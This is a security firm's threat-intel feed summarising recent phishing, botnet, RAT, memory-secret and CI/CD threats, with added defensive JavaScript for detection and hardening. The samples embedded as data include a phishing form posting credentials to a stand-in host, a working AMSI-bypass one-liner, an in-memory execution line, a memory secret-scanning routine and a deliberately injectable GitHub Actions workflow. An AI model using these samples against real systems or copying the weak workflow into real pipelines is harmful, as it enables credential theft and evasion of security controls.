Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 Blob URL Phishing Evades Detection by Hiding Malicious Content in Browser Memory
ANY.RUN reported on a phishing technique that abuses blob URLs to evade detection that keys on URLs and domains. Instead of hosting the phishing page on an external domain, the attacker's JavaScript builds the page inside the victim's browser: the HTML is wrapped in a Blob object and turned into a blob: URL (for example blob:https://<origin>/<uuid>), which is a handle to an object in the browser's memory rather than a web address. The attack typically begins with a phishing email containing a link or an HTML attachment whose script runs in the browser and generates a login page in memory that mimics a legitimate portal. A blob URL is bound to the browsing context that created it and cannot be fetched by anyone else, so URL reputation, domain analysis, URL filtering and domain takedowns have nothing to act on. Blob-based phishing also limits forensic visibility, because the page never exists as a hosted resource: there is no server log or crawlable file for defenders to retrieve and analyze. The one thing the technique cannot hide is the outbound request that carries the harvested credentials to the attacker.
Impact: This technique enables attackers to steal credentials while bypassing many traditional phishing detection controls. Users may be presented with convincing login pages that appear legitimate, increasing the likelihood of credential compromise. The lack of a detectable external domain reduces opportunities for early detection and response.
Recommendation: Organizations should deploy browser-based protections (an extension or enterprise browser policy) able to observe script behavior such as HTML blobs being turned into object URLs and rendered as pages. Focus phishing detection on behavior rather than domain reputation, and on the outbound credential submission, since the harvested credentials still have to be sent to the attacker. Train users to treat a login page whose address bar starts with blob: rather than the expected domain as suspicious, however convincing it looks. Strengthen endpoint and browser telemetry so that in-browser activity associated with phishing attempts is captured.
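The mechanism and a defender-side hook, as an added example that is not part of the ANY.RUN report: the lure page is an ordinary HTML string, and the one step a blob-URL phishing page cannot skip is the URL.createObjectURL() call that turns that string into a blob: URL. The hook below wraps that call, the way a browser extension content script could, and flags HTML blobs that contain a password field, an off-site form action or login lure text. The MIME list, the heuristics, the sample lure and the fake URL object used by the self-check are my assumptions.

```javascript
// Added example (not from the ANY.RUN report): flag HTML blobs at the moment
// a page turns them into blob: URLs, the one step every blob-URL phishing
// page has to take before it can be rendered. Meant to run from a browser
// extension content script injected at document_start; the self-check at
// the bottom uses a fake URL object so the file also runs under Node.

// MIME types a browser will render as a page. Assumption: this is the list
// worth flagging; tune it for your environment.
const RENDERABLE_TYPES = new Set(["text/html", "application/xhtml+xml", "image/svg+xml"]);

// Reasons a renderable blob looks like a credential lure. An empty array
// means either "not renderable as a page" or "nothing suspicious found".
function classifyHtmlBlob(type, text) {
  const mime = String(type || "").split(";")[0].trim().toLowerCase();
  if (!RENDERABLE_TYPES.has(mime)) return [];
  const reasons = [`renderable-blob:${mime}`];
  const body = String(text || "");
  if (/<input[^>]*type\s*=\s*["']?password/i.test(body)) reasons.push("password-field");
  if (/<form[^>]*action\s*=\s*["']?https?:\/\//i.test(body)) reasons.push("form-posts-offsite");
  if (/\b(sign in|log in|verify your account|session (has )?expired)\b/i.test(body)) reasons.push("login-lure-text");
  return reasons;
}

// Wrap urlApi.createObjectURL (window.URL in a browser). readText returns the
// blob body: in a browser pass (b) => b.text(), which is a Promise, so the
// alert fires a tick after the URL is returned; the self-check returns a string.
function installBlobUrlMonitor(urlApi, onAlert, readText) {
  const original = urlApi.createObjectURL;
  const seen = [];
  urlApi.createObjectURL = function (obj) {
    const url = original.call(urlApi, obj);      // never break the page's own call
    // Duck-typed Blob/File check: string type plus numeric size.
    if (obj && typeof obj.type === "string" && typeof obj.size === "number") {
      const report = (text) => {
        const event = { url, type: obj.type, size: obj.size, reasons: classifyHtmlBlob(obj.type, text) };
        seen.push(event);
        if (event.reasons.length > 0) onAlert(event);
      };
      try {
        const text = readText(obj);
        if (text && typeof text.then === "function") text.then(report, () => {}); else report(text);
      } catch (_) { /* telemetry must not interfere with the page */ }
    }
    return url;
  };
  return { seen, uninstall: () => { urlApi.createObjectURL = original; } };
}

// Constructed sample lure: the kind of page the technique assembles in memory.
const SAMPLE_LURE = `<html><body><h2>Your session has expired - sign in to continue</h2>
<form action="https://collector.example.invalid/p" method="post">
<input name="user"><input name="pass" type="password"><button>Sign in</button>
</form></body></html>`;

// Self-check against a fake URL API: one HTML lure, one harmless image blob.
function blobMonitorSelfCheck() {
  const fakeUrlApi = { createObjectURL: () => "blob:https://mail.example.invalid/1f3a9c2e" };
  const alerts = [];
  const mon = installBlobUrlMonitor(fakeUrlApi, (e) => alerts.push(e), (b) => b.body);
  fakeUrlApi.createObjectURL({ type: "text/html", size: SAMPLE_LURE.length, body: SAMPLE_LURE });
  fakeUrlApi.createObjectURL({ type: "image/png", size: 4096, body: "" });
  mon.uninstall();
  return { alerts, seen: mon.seen.length };
}
```

In a browser the hook is installed at document start with installBlobUrlMonitor(window.URL, report, (b) => b.text()); Blob.text() is asynchronous, so the alert lands a tick after the URL is handed back, usually before the page has finished rendering. A page can defeat a JavaScript-level hook by capturing the original function before the content script runs, so treat this as telemetry rather than a control; the signal that cannot be hidden is the outbound POST carrying the credentials.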
🚩 Sapphire Sleet Targets macOS with Sophisticated Lure-to-Compromise Intrusion Chain
Microsoft reported in April 2026 on a macOS-focused intrusion campaign conducted by Sapphire Sleet, Microsoft's name for a North Korea-based, financially motivated threat actor. The operation uses targeted social engineering lures to trick users into executing malicious payloads, leading to full system compromise, and reflects a growing focus on macOS environments, particularly among high-value targets. The attack begins with carefully crafted lures that convince users to download and execute malicious files disguised as legitimate applications or updates. Once executed, the malware establishes persistence and initiates communication with command-and-control (C2) infrastructure. The intrusion chain includes multiple stages designed to evade detection, maintain access, and enable follow-on actions such as data collection and remote command execution. Sapphire Sleet leverages native macOS functionality and blends malicious activity with legitimate processes, reducing visibility for traditional security tools. The campaign demonstrates strong operational discipline, using staged payload delivery and controlled execution to minimize exposure.
Impact: Successful compromise results in persistent access to macOS systems, enabling data exfiltration, credential theft, and further lateral movement. The use of social engineering and trusted-looking applications increases the likelihood of user execution, while stealth techniques extend dwell time. Organizations with macOS endpoints face increased risk, particularly if visibility into endpoint behavior is limited.
Recommendation: Organizations should restrict execution of untrusted applications and enforce application allowlisting on macOS devices. Monitor for unusual process behavior, persistence mechanisms, and outbound connections to unknown infrastructure. Implement endpoint detection and response (EDR) solutions capable of detecting macOS-specific threats. Educate users on targeted phishing and software download risks, especially for unsolicited or unexpected applications. Strengthen visibility into macOS environments and treat them as equal risk to Windows systems in enterprise security strategies.
🚩 PowMix Botnet Targets Czech Workforce Using Compliance-Themed Lures and Randomized C2 Beaconing
Cisco Talos disclosed PowMix, a previously undocumented botnet that has targeted Czech organizations since December 2025 through phishing campaigns using compliance-themed lure documents that impersonate the EDEKA brand and cite the Czech Data Protection Act. The campaign targets human resources and legal staff, recruitment agencies and job seekers in the IT, finance and logistics sectors; the decoy documents contain compensation data and references to real legislation. PowMix overlaps tactically with the ZipLine campaign reported in August 2025: ZIP-based payload concealment, persistence via Windows scheduled tasks, CRC32-based Bot ID generation and abuse of herokuapp[.]com for command-and-control infrastructure. The chain starts with a malicious ZIP containing a Windows shortcut (LNK) file. The shortcut launches a PowerShell loader that copies the ZIP contents to a folder under ProgramData, bypasses AMSI by using reflection to set the amsiInitFailed field to true, carves the embedded payload out of the archive using hardcoded delimiters such as zAswKoK, and executes the PowMix bot directly in memory with Invoke-Expression. To defeat network signatures, PowMix randomizes its beacon interval with Get-Random: 0-261 seconds initially and 1,075-1,450 seconds thereafter. Encrypted heartbeat data and a unique victim identifier are embedded in the C2 URL path so that the traffic resembles calls to a legitimate REST API.
Impact: PowMix derives its Bot ID by running the victim's ProductID from the registry key HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion through a CRC32-style checksum, and uses that ID both for persistence and for deduplication. Persistence is a scheduled task whose name looks like a random hexadecimal string (for example 289c2e236761), triggered daily at 11:00 a.m. A mutex in the Global\ namespace (visible across all user sessions) named after the Bot ID prevents a second instance from running. C2 traffic mimics a web browser: a Chrome User-Agent plus Accept-Language and Accept-Encoding headers, and the host's proxy settings obtained via GetSystemWebProxy with DefaultCredentials, so the beacon authenticates to a corporate proxy as the logged-in user and passes through it like ordinary browsing.
Recommendation: Hunt for scheduled tasks with random hexadecimal names triggered daily at 11:00 a.m., in particular tasks that launch explorer.exe with an LNK file under ProgramData as the argument. Block connections to herokuapp[.]com infrastructure used for C2, allow-listing specific applications if the platform is needed for business. Detect AMSI bypass attempts, that is reflection against the AmsiUtils class that modifies the amsiInitFailed field. Alert on PowerShell processes spawned by explorer.exe whose command line references ProgramData paths and ZIP extraction. Review PowerShell script block logs for Invoke-Expression piped to Out-Null together with $VerbosePreference manipulation. Use the XOR keys and payload markers published in the Talos report in detection content, and monitor for traffic that mimics REST API calls but carries encrypted data in the URL path rather than in query strings or POST bodies.
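The tradecraft above maps onto a handful of hunts. As an added example that is not Talos code, the rules below run over constructed events shaped like Sysmon and Security log records, and a beacon-interval check uses the 1,075-1,450 second band the report gives. Field names, the sample events and the three-gap threshold are my assumptions.

```javascript
// Added example (not Talos code): hunting rules for the PowMix tradecraft
// described above, run over constructed events shaped like Sysmon/Security
// log records. Field names are assumptions; map them to your own telemetry.

const HEX12 = /^[0-9a-f]{12}$/i;                  // task names like 289c2e236761
const PROGRAMDATA = /\\ProgramData\\/i;
const SCRIPT_HOST = /\\(powershell|pwsh)\.exe$/i;
const C2_SUFFIX = ".herokuapp.com";

// Each rule takes one event and returns a finding string or null.
const RULES = [
  // Persistence: hex-named task, daily 11:00, explorer.exe opening an .lnk
  // under ProgramData.
  (e) => e.kind === "task_create" && HEX12.test(e.taskName) &&
         /explorer\.exe/i.test(e.taskCommand) && /\.lnk\b/i.test(e.taskArgs) &&
         PROGRAMDATA.test(e.taskArgs) && e.trigger === "daily 11:00"
         ? `powmix-persistence task=${e.taskName}` : null,
  // Loader: explorer.exe -> PowerShell touching a ZIP under ProgramData.
  (e) => e.kind === "process_create" && /\\explorer\.exe$/i.test(e.parentImage) &&
         SCRIPT_HOST.test(e.image) && PROGRAMDATA.test(e.commandLine) &&
         /(\.zip\b|Expand-Archive|ZipFile)/i.test(e.commandLine)
         ? `powmix-loader pid=${e.pid}` : null,
  // Script block logging (4104): AMSI bypass through reflection.
  (e) => e.kind === "script_block" && /AmsiUtils|amsiInitFailed/i.test(e.script)
         ? `amsi-bypass pid=${e.pid}` : null,
  // Script block logging: IEX piped to Out-Null plus $VerbosePreference tampering.
  (e) => e.kind === "script_block" && /\b(Invoke-Expression|IEX)\b[^\n]*Out-Null/i.test(e.script) &&
         /\$VerbosePreference\s*=/i.test(e.script)
         ? `in-memory-exec pid=${e.pid}` : null,
  // Network: a script host talking to herokuapp.com.
  (e) => e.kind === "network" && SCRIPT_HOST.test(e.image) &&
         e.destHost.toLowerCase().endsWith(C2_SUFFIX)
         ? `c2-domain host=${e.destHost}` : null,
];

function scanEvents(events) {
  const findings = [];
  for (const e of events) {
    for (const rule of RULES) { const f = rule(e); if (f) findings.push(f); }
  }
  return findings;
}

// Beacon check. PowMix sleeps Get-Random 0-261 s at first and 1,075-1,450 s
// afterwards, so the gaps between connections to one host cluster inside a
// band even though no two gaps are equal. Three consecutive gaps inside the
// band count as a beacon here (the threshold is an assumption, not from the report).
function looksLikeBeacon(timestampsMs, minS = 1075, maxS = 1450, needed = 3) {
  const t = [...timestampsMs].sort((a, b) => a - b);
  let run = 0, best = 0;
  for (let i = 1; i < t.length; i++) {
    const gapS = (t[i] - t[i - 1]) / 1000;
    run = gapS >= minS && gapS <= maxS ? run + 1 : 0;
    best = Math.max(best, run);
  }
  return best >= needed;
}

// Constructed sample events (not real telemetry). The AMSI string is the
// well-known reflection pattern the report describes, kept as a detection sample.
const SAMPLE_EVENTS = [
  { kind: "task_create", taskName: "289c2e236761", taskCommand: "C:\\Windows\\explorer.exe",
    taskArgs: "C:\\ProgramData\\HR\\hr-compliance.lnk", trigger: "daily 11:00" },
  { kind: "process_create", pid: 4120, parentImage: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -w hidden -c Copy-Item .\\*.zip C:\\ProgramData\\HR\\" },
  { kind: "script_block", pid: 4120,
    script: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" },
  { kind: "script_block", pid: 4120,
    script: "$VerbosePreference = 'SilentlyContinue'; Invoke-Expression $stage | Out-Null" },
  { kind: "network", pid: 4120, destHost: "update-api-7c1d.herokuapp.com", destPort: 443,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" },
  // Benign noise that must stay quiet.
  { kind: "task_create", taskName: "OneDrive Reporting Task", trigger: "daily 03:00",
    taskCommand: "C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe", taskArgs: "" },
  { kind: "process_create", pid: 5000, parentImage: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\notepad.exe", commandLine: "notepad.exe C:\\ProgramData\\notes.zip" },
];
```

The rules are deliberately narrow so they can be loosened per environment; the beacon check is the part worth keeping even after the infrastructure changes, because jittered sleeps drawn from a fixed range still leave a band-limited gap distribution that a "same interval every time" detector misses.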
🚩 “Phantom in the Vault” Attack Targets Secrets in Memory to Bypass Traditional Security Controls
Elastic Security Labs reported in April 2026 on a technique dubbed “Phantom in the Vault,” where attackers target sensitive secrets directly in memory rather than stealing them from disk or configuration files. The research highlights how modern applications and vaulting solutions protect secrets at rest and in transit, but still expose them temporarily in plaintext within application memory during runtime. Attackers exploit this gap by dumping process memory or injecting into running applications to extract credentials, API keys, and tokens while they are actively in use. This approach bypasses traditional protections such as encryption, secrets managers, and secure storage mechanisms because the data is accessed after it has already been decrypted for legitimate use. The technique is particularly effective in cloud-native and containerized environments, where applications frequently retrieve secrets dynamically from vaults. Once accessed, these secrets can be reused to authenticate to services, escalate privileges, or move laterally across infrastructure.
Impact: This technique enables attackers to bypass standard credential protection mechanisms and gain access to high-value secrets without triggering traditional detection controls. Compromise of these secrets can lead to unauthorized access to cloud services, databases, and internal systems. Because the activity occurs within legitimate processes, it is more difficult to detect and may result in prolonged attacker presence.
Recommendation: Organizations should implement runtime security controls that monitor for abnormal memory access, process injection, and credential harvesting behavior. Limit the exposure window of sensitive secrets by using short-lived tokens and just-in-time access, and by holding secrets in mutable buffers that are overwritten as soon as they have been used rather than in immutable strings that linger on the heap until garbage collection. Enforce least privilege for applications and services accessing secrets. Monitor for unusual access patterns to vault services and correlate them with endpoint activity. Treat in-memory secrets as a critical attack surface and extend detection capabilities beyond traditional storage protections.
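An added illustration, not Elastic's research code, of both halves of the problem: scanRegionForSecrets is the dump-and-grep step an attacker or an analyst runs over a memory region, and withSecret shows what limiting the exposure window looks like in code. The heap is a constructed 4 KiB buffer standing in for a process dump, the token values are made up (the AWS one is the documentation example key id), and the token formats are public prefixes.

```javascript
// Added example (not Elastic's research code): scanRegionForSecrets() is the
// dump-and-grep step an attacker or an analyst runs over a memory region;
// withSecret() shows how a secret held in a mutable buffer is wiped once it
// has been used. The heap below is a constructed Buffer standing in for a
// process dump; token values are made up, token formats are public prefixes.

const SECRET_PATTERNS = [
  { kind: "aws-access-key-id",   re: /AKIA[0-9A-Z]{16}/g },
  { kind: "github-token",        re: /gh[pousr]_[A-Za-z0-9]{36}/g },
  { kind: "vault-service-token", re: /hvs\.[A-Za-z0-9_-]{24,}/g },
  { kind: "jwt",                 re: /eyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}/g },
  { kind: "bearer-header",       re: /Bearer [A-Za-z0-9._~+\/=-]{20,}/g },
];

// Scan the bytes as 8-bit text and as UTF-16LE at both byte alignments,
// because Windows and .NET keep strings as UTF-16 in memory and an ASCII-only
// grep walks straight past them. Each hit carries its byte offset.
function scanRegionForSecrets(region) {
  const views = [
    { enc: "latin1",    text: region.toString("latin1"),              toByte: (i) => i },
    { enc: "utf16le",   text: region.toString("utf16le"),             toByte: (i) => i * 2 },
    { enc: "utf16le+1", text: region.subarray(1).toString("utf16le"), toByte: (i) => i * 2 + 1 },
  ];
  const findings = [];
  for (const v of views) {
    for (const { kind, re } of SECRET_PATTERNS) {
      re.lastIndex = 0;
      let m;
      while ((m = re.exec(v.text)) !== null) {
        findings.push({ kind, enc: v.enc, offset: v.toByte(m.index),
                        preview: m[0].slice(0, 6) + "..." + m[0].slice(-4) });
      }
    }
  }
  return findings;
}

// Run fn with the secret, then overwrite it in place whatever happens.
// Only mutable buffers can be wiped; a string copy of the secret cannot be.
function withSecret(secretBuf, fn) {
  try { return fn(secretBuf); } finally { secretBuf.fill(0); }
}

// Constructed "heap": 4 KiB of filler with two tokens a vault client might
// hold after decrypting them, one as 8-bit text and one as UTF-16LE at an odd
// offset. tokenView is a view into the heap, not a copy, like a variable
// pointing at heap memory.
function buildSampleHeap() {
  const heap = Buffer.alloc(4096, 0x20);
  const asciiToken = "hvs.CAESIJ8v2kQ1mN4pR7tU0wX3yZ6bD9fG2hJ5kL8nP1sV4cA7";   // made up
  const utf16Token = "AKIAIOSFODNN7EXAMPLE";                                     // AWS docs example id
  heap.write(asciiToken, 1000, "latin1");
  heap.write(utf16Token, 2501, "utf16le");
  return { heap, tokenView: heap.subarray(1000, 1000 + asciiToken.length) };
}

// Scan, use and wipe the first token, scan again. Only the wiped token is gone.
function demoExposureWindow() {
  const { heap, tokenView } = buildSampleHeap();
  const before = scanRegionForSecrets(heap);
  const used = withSecret(tokenView, (t) => t.length);   // "use" stands in for putting it in a header
  const after = scanRegionForSecrets(heap);
  return { before, after, used };
}
```

Two things to notice when running it: the UTF-16 passes matter because an ASCII-only grep misses the second token entirely, and only the secret that was held in a mutable buffer and wiped disappears from the second scan. A secret that has been copied into an immutable string (a JavaScript string, a Java String, a Python str) cannot be wiped, which is why vault clients that hand back strings leave exactly the residue this technique collects.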
🚩 Janelar RAT Targets Financial Institutions with Stealthy Remote Access and Credential Theft
Kaspersky reported in April 2026 on a financial threat in Latin America involving a remote access trojan (RAT) known as Janelar. The malware is designed to target financial institutions and their customers, using phishing and social engineering techniques to gain initial access. Once executed, Janelar establishes persistent remote control over the infected system. The malware operates by injecting itself into legitimate processes and maintaining communication with command-and-control (C2) infrastructure to receive instructions. It is capable of monitoring user activity, capturing credentials, and interacting with financial applications. Its design allows attackers to observe and manipulate sessions in real time, enabling fraudulent transactions and account takeover. Janelar is tailored for financial targeting, focusing on banking systems and user interactions with financial platforms. The malware’s ability to blend into legitimate processes and maintain persistent access increases its effectiveness and reduces detection likelihood.
Impact: Successful infection enables attackers to steal banking credentials, hijack sessions, and perform unauthorized financial transactions. This can lead to direct financial loss, fraud, and reputational damage for both users and financial institutions. The malware’s persistence and stealth increase the likelihood of prolonged compromise.
Recommendation: Organizations should strengthen endpoint detection to identify process injection and abnormal behavior in financial applications. Monitor for suspicious outbound connections to unknown infrastructure and unusual session activity. Implement multi-layered fraud detection that includes device and session monitoring. Educate users on phishing risks, particularly those targeting financial services. Enforce strong authentication controls and limit exposure of sensitive financial operations to compromised endpoints.
GitHub Actions Misconfigurations Expose CI/CD Pipelines to Secret Theft and Code Injection
Wiz reported in April 2026 on widespread security risks in GitHub Actions pipelines, where misconfigurations can allow attackers to steal secrets, inject malicious code, or compromise software supply chains. The research highlights that CI/CD workflows often have excessive permissions, insecure triggers, and insufficient validation of external inputs, creating opportunities for abuse. Workflows that run on untrusted events are the main entry point: a pull_request_target workflow runs in the context of the base repository with access to its secrets, so if it checks out and builds code from a fork, the fork's author controls what executes with those secrets. Exfiltrated tokens can then be reused to access repositories, cloud environments, or deployment systems. Self-hosted runners add a further risk, since code executing on them can reach internal infrastructure. The issue is not a single vulnerability but a combination of insecure design patterns and default configurations: over-permissioned GITHUB_TOKEN scopes, untrusted event data (a pull request title, an issue body) interpolated directly into run: scripts, lack of isolation between workflows, and third-party actions referenced by mutable tags rather than commit SHAs. These gaps make CI/CD pipelines a high-value target for attackers seeking to compromise development and production environments.
Impact: Compromise of GitHub Actions pipelines can lead to theft of sensitive credentials, unauthorized code changes, and downstream supply chain attacks. Attackers may gain access to production systems, cloud infrastructure, or customer data. Because CI/CD pipelines are trusted components of the development process, compromises can propagate widely and remain undetected.
Recommendation: Organizations should enforce least privilege for GITHUB_TOKEN (a top-level permissions: block, read-only by default) and restrict access to secrets based on workflow context. Avoid exposing secrets to workflows triggered by untrusted sources such as forked repositories: prefer pull_request over pull_request_target, and never check out the fork's code in a job that holds secrets. Pin third-party actions to full commit SHAs rather than mutable tags or branches, and review what they do. Pass untrusted event fields into scripts through environment variables instead of interpolating them into run: commands. Isolate self-hosted runners, keep them off pull-request workloads, and restrict their network access. Monitor pipeline activity for unusual execution patterns and implement logging and auditing for all CI/CD operations. Treat CI/CD pipelines as critical infrastructure and apply the same security controls as production systems.
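As an added example that is not Wiz's tooling, the lint below encodes the patterns from the report as checks over workflow YAML text and runs them against a constructed weak workflow and its hardened counterpart. The rule names, messages and sample workflows are mine; the commit SHA in the hardened sample should be verified against the release you actually pin.

```javascript
// Added example (not Wiz's tooling): a dependency-free lint over workflow
// YAML text for the misconfigurations discussed above, with a weak workflow
// and its hardened counterpart embedded as constructed samples. It works
// line by line with regexes; a production linter would parse the YAML.

const PINNED_SHA = /@[0-9a-f]{40}$/;

function lintWorkflow(yaml) {
  const lines = yaml.split("\n");
  const findings = [];
  const add = (line, rule, msg) => findings.push({ line, rule, msg });
  // Trigger context decides how dangerous some of the patterns are.
  const prTarget = /^\s*pull_request_target\s*:/m.test(yaml) || /^on:.*\bpull_request_target\b/m.test(yaml);
  const prTrigger = prTarget || /^\s*pull_request\s*:/m.test(yaml) || /^on:.*\bpull_request\b/m.test(yaml);
  // Top-level permissions: only an unindented key counts.
  if (!/^permissions\s*:/m.test(yaml))
    add(1, "no-top-level-permissions", "GITHUB_TOKEN keeps the repository's default scopes; add a top-level permissions: block");
  lines.forEach((raw, i) => {
    const n = i + 1, l = raw.trim();
    if (/^permissions\s*:\s*write-all\b/.test(l)) add(n, "write-all-token", "GITHUB_TOKEN granted write-all");
    const uses = l.match(/^-?\s*uses:\s*([^\s#]+)/);
    if (uses && !/^(\.\/|docker:\/\/)/.test(uses[1]) && !PINNED_SHA.test(uses[1]))
      add(n, "unpinned-action", `${uses[1]} is pinned to a mutable tag or branch, not a commit SHA`);
    if (prTarget && /ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)\b/.test(l))
      add(n, "pr-target-checks-out-fork", "pull_request_target checks out the fork's code, which then runs with base-repo secrets");
    // Untrusted event text anywhere other than an env assignment or a step
    // name is treated as a script sink (conservative on purpose).
    if (/\$\{\{\s*github\.event\.(issue|pull_request|comment|head_commit|review)\.[a-z_.]*(title|body|message|head\.ref|label\.name)\b/.test(l)
        && !/^(name|[A-Z][A-Z0-9_]*)\s*:/.test(l))
      add(n, "expression-injection", "untrusted event field interpolated into a script; pass it via env: and quote the variable");
    if (prTrigger && /runs-on:.*self-hosted/.test(l))
      add(n, "self-hosted-on-pr", "self-hosted runner exposed to pull-request workloads");
  });
  return findings;
}

// Constructed weak workflow: each risky line is one pattern from the report.
const WEAK_WORKFLOW = [
  "name: PR triage",
  "on:",
  "  pull_request_target:",
  "    types: [opened, synchronize]",
  "jobs:",
  "  triage:",
  "    runs-on: [self-hosted, linux]",
  "    steps:",
  "      - uses: actions/checkout@v4",
  "        with:",
  "          ref: ${{ github.event.pull_request.head.sha }}",
  "      - name: Greet",
  "        run: echo \"Thanks for PR ${{ github.event.pull_request.title }}\"",
  "      - run: npm ci && npm test",
  "        env:",
  "          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}",
].join("\n");

// Hardened counterpart: pull_request (fork runs get no secrets and a read-only
// token), least-privilege permissions, action pinned to a full commit SHA
// (verify it against the release you pin), untrusted text passed via env.
const HARDENED_WORKFLOW = [
  "name: PR triage",
  "on:",
  "  pull_request:",
  "    types: [opened, synchronize]",
  "permissions:",
  "  contents: read",
  "jobs:",
  "  triage:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2",
  "        with:",
  "          persist-credentials: false",
  "      - name: Greet",
  "        env:",
  "          PR_TITLE: ${{ github.event.pull_request.title }}",
  "        run: echo \"Thanks for PR $PR_TITLE\"",
  "      - run: npm ci && npm test",
].join("\n");
```

The hardened version changes the trigger to pull_request, sets least-privilege permissions, pins the action to a commit SHA and moves the untrusted PR title into env:, where the shell sees it as data rather than as part of the script. If a job genuinely needs pull_request_target, keep the fork checkout and the secrets in separate jobs so that attacker-controlled code never runs where the secrets are.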
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.